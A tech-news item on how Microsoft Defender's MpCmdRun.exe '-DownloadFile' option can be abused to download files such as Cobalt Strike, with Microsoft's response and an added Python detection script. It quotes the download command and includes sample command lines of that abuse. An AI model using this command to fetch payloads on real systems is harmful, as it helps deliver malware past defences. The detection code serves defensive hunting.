Microsoft previously added the ability to download files through the command line in Microsoft Defender. Tester Mohammad Askar said that changes to the Microsoft Defender command-line tool may allow attackers to use it to download malicious programs.
According to a report from MSPoweruser, Microsoft responded in a statement:
Despite these reports, Microsoft Defender Antivirus and Microsoft Defender ATP will still protect customers from malicious software. These programs will detect malicious files downloaded to the system through the antivirus file download function.
Microsoft also stated that this feature cannot be used for privilege escalation.
Naijatechnews learned that Askar previously stated that the Microsoft Defender command-line tool supports the new “-DownloadFile” function. An attacker can use the Microsoft Anti-Malware Service command-line utility to download files from the Internet with the following command: “MpCmdRun.exe -DownloadFile -url <url> -path <local-path>”.
In this way, Askar was able to download the Cobalt Strike malware from a remote location directly through Microsoft Defender.
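Defenders can hunt for this usage in process-creation telemetry by looking for MpCmdRun invoked with “-DownloadFile” and recording the URL and destination path. The following Python is an added example, not code from the original article, Askar, or Microsoft; the sample command lines and hostnames are constructed, and case-insensitive flag matching is an assumption made to keep the check conservative.

```python
import re

# Constructed process-creation command lines (not real telemetry).
SAMPLE_CMDLINES = [
    r'"C:\Program Files\Windows Defender\MpCmdRun.exe" -Scan -ScanType 1',
    r'MpCmdRun.exe -DownloadFile -url https://files.example.test/a.bin -path "C:\Users\Public\a.bin"',
    r'cmd.exe /c mpcmdrun.EXE -downloadfile -URL http://files.example.test/b -PATH C:\Temp\b',
    r'notepad.exe C:\notes\MpCmdRun -DownloadFile.txt',
]

_TOKEN = re.compile(r'"[^"]*"|\S+')  # a quoted string, or a run of non-whitespace


def _tokens(cmdline):
    return [t.strip('"') for t in _TOKEN.findall(cmdline)]


def find_defender_download(cmdline):
    """Return {'url': ..., 'path': ...} when the line runs MpCmdRun with
    -DownloadFile, otherwise None. Flag matching is case-insensitive (assumption)."""
    toks = _tokens(cmdline)
    lower = [t.lower() for t in toks]
    # Find the binary anywhere in the line so wrappers like "cmd.exe /c" are covered.
    exe = next((i for i, t in enumerate(lower)
                if re.split(r"[\\/]", t)[-1] in ("mpcmdrun.exe", "mpcmdrun")), None)
    if exe is None:
        return None
    rest, rest_lower = toks[exe + 1:], lower[exe + 1:]
    if "-downloadfile" not in rest_lower:
        return None
    found = {}
    for flag in ("-url", "-path"):
        value = None
        if flag in rest_lower:
            i = rest_lower.index(flag)
            value = rest[i + 1] if i + 1 < len(rest) else None
        found[flag.lstrip("-")] = value
    return found


def scan(cmdlines):
    """Return (cmdline, details) pairs for every line that should be reviewed."""
    return [(line, d) for line in cmdlines
            if (d := find_defender_download(line)) is not None]


if __name__ == "__main__":
    for line, details in scan(SAMPLE_CMDLINES):
        print(f"REVIEW url={details['url']} path={details['path']} :: {line}")
```

The last sample line is a deliberate near-miss: a file name containing the flag text is not reported because the check requires an exact “-DownloadFile” argument after the binary.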